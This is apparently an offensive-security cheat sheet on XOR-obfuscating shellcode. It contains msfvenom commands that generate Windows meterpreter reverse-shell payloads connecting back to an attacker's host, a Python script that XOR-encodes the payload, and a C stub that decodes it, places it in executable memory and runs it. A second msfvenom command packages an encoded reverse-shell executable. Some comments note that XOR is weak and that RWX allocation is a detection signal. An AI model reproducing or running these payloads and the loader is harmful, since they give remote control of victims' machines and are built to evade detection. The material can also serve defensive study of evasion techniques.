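XOR Encryption

Note: a single-byte XOR is reversible obfuscation rather than encryption. There are only 256 possible keys, and it changes the stored bytes only; once decoded in memory, the payload is unchanged.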

Generate payload + XOR key

# Step 1: write the payload as raw bytes (-f raw) to sc.bin; <ip> is a placeholder.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw > sc.bin
# Step 2: XOR every byte of sc.bin with the single-byte key 0xAA and write sc_xor.bin.
# The key here must match KEY in the C stub further down the page.
python3 xor_encrypt.py -i sc.bin -o sc_xor.bin -k 0xAA

Python XOR encrypt script

import argparse

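def xor(data: bytes, key: int) -> bytes:
    """Return *data* with every byte XORed against the single byte *key*.

    The operation is its own inverse: applying it twice with the same key
    returns the original bytes. It is an encoding, not encryption. The key
    space is 256 values, and every zero byte in the input appears as the
    key byte itself in the output.

    Args:
        data: Bytes to transform.
        key: Key byte in the range 0..255.

    Returns:
        A new ``bytes`` object of the same length as *data*.

    Raises:
        ValueError: If *key* is outside 0..255.
    """
    # Reject out-of-range keys up front. Otherwise bytes() fails later with a
    # message that never mentions the key, and empty input hides the error.
    if not 0 <= key <= 0xFF:
        raise ValueError(f"key must be a single byte (0..255), got {key}")
    return bytes(b ^ key for b in data)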

# Command-line interface: input path, output path and the single-byte key.
parser = argparse.ArgumentParser()
parser.add_argument(
    "-i",
    required=True,
    help="Input file",
)
parser.add_argument(
    "-o",
    required=True,
    help="Output file",
)
parser.add_argument(
    "-k",
    # Base 0 lets the key be written as 0xAA, 0o252, 0b10101010 or 170.
    type=lambda text: int(text, 0),
    default=0xAA,
    help="XOR key byte",
)
args = parser.parse_args()

# Read the whole input in binary mode.
with open(args.i, "rb") as src:
    data = src.read()

# The output file is opened first and the transform runs inside the block,
# so the file is created or truncated before xor() is evaluated.
with open(args.o, "wb") as dst:
    dst.write(xor(data, args.k))

print(f"Encrypted {len(data)} bytes with key 0x{args.k:02X}")

C — XOR decrypt + execute stub

#include <windows.h>

/* Encoded payload bytes. The initializer is a placeholder on this page; no bytes are given. */
unsigned char sc[] = { /* XOR-encrypted shellcode here */ };
/* Single-byte XOR key. It must equal the -k value passed to xor_encrypt.py
   (0xAA is that script's default). */
#define KEY 0xAA

/*
 * Decode the embedded buffer in place, copy it to a freshly allocated
 * region, and transfer control to that region.
 *
 * Analysis note: the XOR step changes only the bytes stored in the binary.
 * After the loop the decoded payload is present in process memory, both in
 * sc and in the allocated region. A read/write/execute allocation followed
 * by a call into it is behaviour that endpoint monitoring commonly keys on.
 */
int main() {
    /* Reverse the encoder: XOR each byte of sc with KEY, in place. */
    for (int i = 0; i < sizeof(sc); i++) sc[i] ^= KEY;

    /* Commit sizeof(sc) bytes that are readable, writable and executable at
       once (PAGE_EXECUTE_READWRITE). */
    void* mem = VirtualAlloc(0, sizeof(sc), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    /* Copy the decoded bytes into the new region. */
    memcpy(mem, sc, sizeof(sc));
    /* Cast the region's start address to a no-argument function pointer and call it. */
    ((void(*)())mem)();
    return 0;
}

msfvenom built-in XOR dynamic encoder

# -e selects the x86/xor_dynamic encoder, -f exe wraps the result in a Windows
# executable, and -o names the output file. <ip> and <port> are placeholders.
# The output still carries a decoder stub alongside the encoded payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/xor_dynamic -f exe -o xor_payload.exe